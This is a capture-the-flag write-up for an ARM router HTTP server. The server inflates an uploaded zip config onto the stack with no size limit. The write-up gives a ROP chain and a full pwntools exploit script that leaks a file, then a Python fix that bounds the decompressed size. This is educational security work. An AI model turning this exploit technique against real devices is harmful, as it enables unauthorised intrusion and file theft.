1337router was an ARM executable with ASLR disabled, implementing an HTTP server. The vulnerability was that we could upload a zip file (which contained an httpd.conf). The zip was decompressed afterwards. The zip file had a size limit of 512 bytes. Of course the decompressed size was not checked, and it was decompressed onto the stack. It's time for ROPgadget.

I used a function of the executable to help me read any file. It was meant to read an HTML file and send it back as an HTTP response. It takes two parameters: a buffer (in r1) and a path to the file (in r0). As there was no ASLR, the buffer could just point to a static position. r0 was a little more difficult, as the stack was randomized. However, gdb told me that r4 pointed into the stack at a controllable position, so let's just move r4 into r0. We end up with a simple ROP chain.

0x849ec pop {r1, pc};
0x691ec mov r0, r4; pop {r4, r5, r6, r7, r8, pc};
0x10934 sendresponse(buf, filepath);

The final dirty code:

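from pwn import *
import struct
import zipfile

r = remote("", 5555)

def buildreq(content):
    # Build the multipart upload request. Byte strings are used throughout
    # so the zip content can be concatenated without encoding problems.
    return b"POST /page?=conf HTTP/1.1\r\n" + \
           b"Host:\r\n" + \
           b"Connection: keep-alive\r\n" + \
           b"Content-Length: " + str(191 + len(content)).encode() + b"\r\n" + \
           b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOVOtoTifyI9clR75\r\n" + \
           b"User-Agent: Mozilla/5.0\r\n" + \
           b"Accept: text/html\r\n\r\n" + \
           b"------WebKitFormBoundaryOVOtoTifyI9clR75\r\n" + \
           b"Content-Disposition: form-data; name=\"config\"; filename=\"config.zip\"\r\n" + \
           b"Content-Type: application/zip\r\n\r\n" + \
           content + \
           b"\r\n------WebKitFormBoundaryOVOtoTifyI9clR75--\r\n"
    # The part headers plus the closing boundary are the 191 bytes
    # added to len(content) in Content-Length.

def sploit():
    fname = b"flag"
    with zipfile.ZipFile("file.zip", "w", compression=zipfile.ZIP_DEFLATED) as zf:
        # 524 bytes of padding, then the chain:
        #   0x849ec  pop {r1, pc}            -> r1 = 0xaef4c (static buffer)
        #   0x691ec  mov r0, r4; pop {r4-r8, pc}
        #   0x10934  sendresponse(buf, filepath)
        # followed by filler and the NUL-terminated file name.
        zf.writestr(
            "httpd.conf", b"A" * 524 + struct.pack(
            "<IIIIIIIII", 0x849ec, 0xaef4c, 0x691ec, 0, 0, 0, 0, 0, 0x10934) + b"B" * 8 + fname + b'\x00')
    with open("file.zip", "rb") as f:
        content = f.read()
    # The send/receive lines are missing from the page; this is the
    # assumed minimal form.
    r.send(buildreq(content))
    print(r.recvall())

if __name__ == '__main__':
    sploit()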
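
The root cause described at the top (a 512-byte limit on the upload, no limit on the inflated size) can be closed by bounding the decompressed data before it reaches a fixed-size buffer. The following is an added example, not code from the challenge or from the original writeup; `read_member_bounded`, `make_zip`, `OversizedMember` and the `MAX_INFLATED` value are assumptions made for illustration, and the sample archives are constructed.

```python
import io
import zipfile

MAX_UPLOAD = 512    # compressed-size limit stated in the writeup
MAX_INFLATED = 512  # assumed destination buffer size (not given on the page)


class OversizedMember(ValueError):
    """Raised when an upload or its inflated content exceeds a limit."""


def read_member_bounded(zip_bytes, name="httpd.conf", limit=MAX_INFLATED):
    """Return the decompressed member, refusing anything larger than limit."""
    if len(zip_bytes) > MAX_UPLOAD:
        raise OversizedMember("upload exceeds %d bytes" % MAX_UPLOAD)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        info = zf.getinfo(name)
        # First gate: the uncompressed size the archive declares.
        if info.file_size > limit:
            raise OversizedMember("declared size %d > %d" % (info.file_size, limit))
        # Second gate: the declared size comes from the uploaded file,
        # so also cap the number of bytes actually read from the inflater.
        with zf.open(info) as member:
            data = member.read(limit + 1)
    if len(data) > limit:
        raise OversizedMember("inflated data exceeds %d bytes" % limit)
    return data


def make_zip(payload, name="httpd.conf"):
    """Build a constructed sample archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    small = make_zip(b"port 8080\n")
    big = make_zip(b"A" * 4096)  # constructed: repetitive data compresses well
    print(len(big), "compressed bytes hold 4096 inflated bytes")
    print(read_member_bounded(small))
    try:
        read_member_bounded(big)
    except OversizedMember as exc:
        print("rejected:", exc)
```

The 4096-byte member passes the 512-byte upload check after compression, which is why the limit has to be enforced on the inflated size as well.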